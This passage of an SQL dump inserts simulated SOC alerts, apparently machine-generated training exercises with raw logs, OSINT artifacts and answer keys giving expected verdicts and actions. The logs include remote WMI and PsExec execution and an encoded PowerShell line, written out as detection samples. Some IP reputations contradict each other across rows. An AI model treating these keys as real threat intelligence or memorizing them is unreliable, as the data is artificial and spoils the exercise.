storage server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rsync -av /data 192.168.1.51:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Rsync command matches scheduled backup operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected data transfer is consistent with scheduled administrative backups and requires no further action.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1901, 'Misconfigured Legacy App Generating Excess Traffic', 'medium', 'Suricata', 'A legacy application is generating excessive network traffic, resembling potential data exfiltration.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.100\",\"dst_ip\":\"203.0.113.10\",\"username\":\"legacy_user\",\"hostname\":\"LEGACY-APP-SERVER\",\"command_line\":\"legacy_app --export-data --target 203.0.113.10\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP associated with a trusted partner\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"legacy_app --export-data --target 203.0.113.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches routine data export operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert was generated due to a misconfigured legacy application, but the external IP is trusted, and routine operations were confirmed.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1902, 'System Health Check Triggering Suspicious Activity Alerts', 'low', 'Wireshark', 'Network traffic resembling a potential attack was detected, originating from a routine system health check script.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"192.168.3.20\",\"username\":\"sysadmin\",\"hostname\":\"HEALTH-CHECK01\",\"command_line\":\"ping -c 4 192.168.3.20\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to a system performing routine health checks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is a target device of routine health checks\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"ping -c 4 192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Ping command is part of routine system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The detected network activity is consistent with routine system health checks and poses no threat.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1903, 'Unauthorized Remote Access Attempt Detected', 'medium', 'Zeek', 'Anomalous remote login attempt detected from an external IP address, potentially indicating a brute force attack. Multiple failed login attempts reported.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.15\",\"username\":\"admin\",\"hostname\":\"server01\",\"failed_attempts\":12}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 15 times for suspicious activity but no confirmed attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common username for administrative accounts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login attempts were from a known IP range used by a legitimate external monitoring service. Before closing, confirm the source IP against the allowlist maintained for that service and verify that none of the 12 attempts against the admin account succeeded; if either check fails, treat this as a credential attack rather than a false positive.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1904, 'Routine Network Health Check Triggered Data Exfiltration Alert', 'low', 'Suricata', 'Network activity resembling data exfiltration detected, originating from a known internal scanner conducting routine checks.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.25\",\"dst_ip\":\"192.168.1.100\",\"hostname\":\"network-scanner\",\"data_volume\":\"500MB\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Inventory\",\"verdict\":\"internal\",\"details\":\"IP address belongs to internal network scanning tool.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Activity aligns with scheduled network health checks; no actual data exfiltration detected.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1905, 'Suspicious Command Execution Detected on Web Server', 'high', 'Corelight', 'Potential command injection detected on a web server. The command executed appears to be part of a routine script used for maintenance.', 'Lateral Movement', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.5\",\"hostname\":\"webserver01\",\"command_line\":\"/usr/bin/bash /opt/scripts/cleanup.sh\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/bash /opt/scripts/cleanup.sh\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Script matches known maintenance routines.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command matches a routine maintenance script executed by authorized personnel.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1906, 'Anomalous DNS Traffic Indicating Potential C2 Communication', 'medium', 'Wireshark', 'Unusual DNS queries detected that resemble C2 beaconing. Queries originate from a misconfigured device sending repeated DNS requests.', 'Malware', 'T1071.004', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.0.20\",\"hostname\":\"misconfigured-device\",\"domain\":\"beacon.example.com\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"beacon.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain seen in unusual traffic patterns; no confirmed malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Inventory\",\"verdict\":\"internal\",\"details\":\"Device identified as a misconfigured IoT device.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The device was generating unusual DNS requests due to a configuration error; not indicative of C2 communication.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1907, 'Confirmed Malware Infection Detected on Workstation', 'critical', 'Darktrace', 'Malware detected on a workstation attempting to communicate with a known malicious IP. Immediate attention required to prevent data breach.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:05:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.45\",\"dst_ip\":\"203.0.113.99\",\"hostname\":\"workstation12\",\"file_hash\":\"3b2e1a7f9c1d4e5a8f4b5c6d7e8f9a0b\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple malware campaigns and C2 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b2e1a7f9c1d4e5a8f4b5c6d7e8f9a0b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware variant used in targeted attacks.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Malicious IP and file hash confirmed through OSINT; immediate remediation necessary to prevent further compromise.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1908, 'Unusual Network Connection from Internal System', 'medium', 'Zeek', 'A network connection from an internal IP to a known external IP associated with routine IT vulnerability scanning was detected.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"itadmin\",\"hostname\":\"internal-server-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, part of routine operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with vulnerability scanning services, no malicious activity.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"IP 203.0.113.45 is associated with authorized vulnerability scanning. No further action required.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1909, 'Failed Login Attempts Detected on Internal System', 'low', 'Corelight', 'Multiple failed login attempts were detected from a foreign IP address on an internal system. IP is associated with benign activity.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:23:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"workstation-02\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP has no reports of malicious activity. Likely benign scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, normal operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Failed login attempts from IP 198.51.100.23 show no indicators of malicious intent and are consistent with routine activity; confirm that no successful authentication for jdoe followed the failures before closing.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1910, 'Routine Backup Traffic Mistaken for Data Exfiltration', 'low', 'Darktrace', 'Data transfer from an internal server to an external backup server was flagged as suspicious data exfiltration.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"backupadmin\",\"hostname\":\"backup-server-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, routine backup operation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP is associated with authorized external backup services.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Data transfer to IP 203.0.113.200 is part of regular backup procedures.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1911, 'Authorized Admin Access Mistaken for Lateral Movement', 'medium', 'Suricata', 'Admin access from a central management console to an internal server was flagged as potential lateral movement.', 'Lateral Movement', 'T1047', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"adminuser\",\"hostname\":\"mgmt-console\",\"request_body\":\"\",\"command_line\":\"wmic /node:10.0.0.25 process call create calc.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, recognized admin console.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, normal server operation.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:10.0.0.25 process call create calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized command execution by admin user.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Command execution was performed by an authorized admin user via a recognized management console. Remote process creation via WMI is also a common lateral-movement technique, so confirm the action against a change record or the console activity log before closing.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1912, 'Malicious Command Execution Detected on Internal Server', 'high', 'Wireshark', 'A command was executed on an internal server that matches known patterns of malicious activity, indicating potential compromise.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.35\",\"username\":\"unknown\",\"hostname\":\"compromised-server\",\"request_body\":\"\",\"command_line\":\"powershell -EncodedCommand Y2FsYy5leGU=\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potential compromised source.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potential compromised target.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand Y2FsYy5leGU=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of unauthorized access.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The encoded PowerShell command suggests lateral movement activity with malicious intent.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1913, 'Suspicious Network Activity Detected - False Positive', 'medium', 'Suricata', 'Routine IT vulnerability scan detected as potential data exfiltration attempt. The source IP belongs to an internal security tool.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"scanner01\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for authorized vulnerability scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This is a known internal IP used for routine scanning, not an actual exfiltration event.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1914, 'False Positive: Routine Administrative Backup', 'low', 'Corelight', 'Backup traffic misidentified as data exfiltration. The activity was normal and expected for scheduled backups.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.10\",\"dst_ip\":\"192.168.50.20\",\"username\":\"backupuser\",\"hostname\":\"backupserver\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address used for authorized data backup.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP address is part of a known backup server cluster performing routine operations.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1915, 'Authorized Administrative Activity Detected as Lateral Movement', 'medium', 'Darktrace', 'Detected administrative access from IT personnel flagged as potential lateral movement. The access was legitimate.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.75.15\",\"dst_ip\":\"192.168.75.25\",\"username\":\"it_admin\",\"hostname\":\"admin-pc\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.75.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT staff for legitimate administrative tasks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was conducted by authorized IT personnel and is not suspicious.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1916, 'False Positive: Misconfigured Legacy Application', 'low', 'Zeek', 'Network traffic from a misconfigured legacy application detected as potential C2 beaconing. The application is not malicious.', 'C2', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.100.50\",\"dst_ip\":\"192.168.100.200\",\"username\":\"legacyapp\",\"hostname\":\"legacy-server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a known legacy application server.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"The traffic is generated by a non-malicious legacy application due to configuration errors.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1917, 'C2 Beaconing to External IP Detected', 'high', 'Wireshark', 'Detected C2 beaconing from an internal workstation to an external IP address. OSINT lookup confirms the IP is associated with known malicious activities.', 'C2', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"N/A\",\"hostname\":\"workstation01\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks and C2 activities.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"OSINT confirms malicious activities associated with the external IP address, and the connection was initiated from the internal workstation, indicating a true positive.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1918, 'Suspicious PSExec Lateral Movement Detected', 'medium', 'Corelight', 'A PSExec command was executed from an internal IP to another internal host, indicating potential lateral movement.', 'Lateral Movement', 'T1021.002', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.15\",\"dst_ip\":\"10.0.2.20\",\"username\":\"admin_user\",\"hostname\":\"workstation-01\",\"command_line\":\"psexec \\\\\\\\10.0.2.20 -u admin_user cmd.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP, part of authorized network activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.2.20 -u admin_user cmd.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Routine administrative task\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity is part of routine IT maintenance and administrative tasks; confirm that admin_user is an approved administrator for 10.0.2.20 and that the session originated from an expected admin workstation before closing.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1919, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'Network traffic analysis detected scanning activities from an internal network scanner.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:55:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"-\",\"hostname\":\"scanner-01\",\"request_body\":\"-\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for authorized scanning activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target of authorized internal scan\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected network scan is part of routine security assessments conducted by the IT department.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1920, 'False Positive Lateral Movement via WMI Detected', 'medium', 'Suricata', 'WMI command detected between two internal hosts, potentially indicating lateral movement, but confirmed as a scheduled task.', 'Lateral Movement', 'T1047', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:40:25Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.5.10\",\"dst_ip\":\"10.0.5.15\",\"username\":\"scheduler\",\"hostname\":\"server-01\",\"command_line\":\"wmic /node:10.0.5.15 process call create \'cmd /c echo scheduled task\'\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Initiating internal IP, part of routine scheduled tasks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.5.15 process call create \'cmd /c echo scheduled task\'\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled task execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This action is part of a routine scheduled task and does not represent malicious activity.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1921, 'Data Exfiltration Alert from Legacy System', 'high', 'Darktrace', 'Unusual data transfer detected from a legacy system to an external IP, appearing suspicious but traced to authorized backup process.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:10:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"172.16.0.5\",\"dst_ip\":\"198.51.100.10\",\"username\":\"backup_user\",\"hostname\":\"legacy-system-01\",\"request_body\":\"-\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in legitimate backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected data transfer is part of a scheduled backup process to an external server.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1922, 'C2 Beaconing to Malicious IP Detected', 'critical', 'Wireshark', 'A network connection from an internal host to a known malicious IP indicative of C2 beaconing.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"203.0.113.45\",\"username\":\"unknown\",\"hostname\":\"infected-host-01\",\"request_body\":\"-\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP showing signs of compromise\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 and malware activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The outbound connection to a known C2 IP strongly indicates malware on the internal host; forensic collection should confirm the responsible process before the case is closed.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
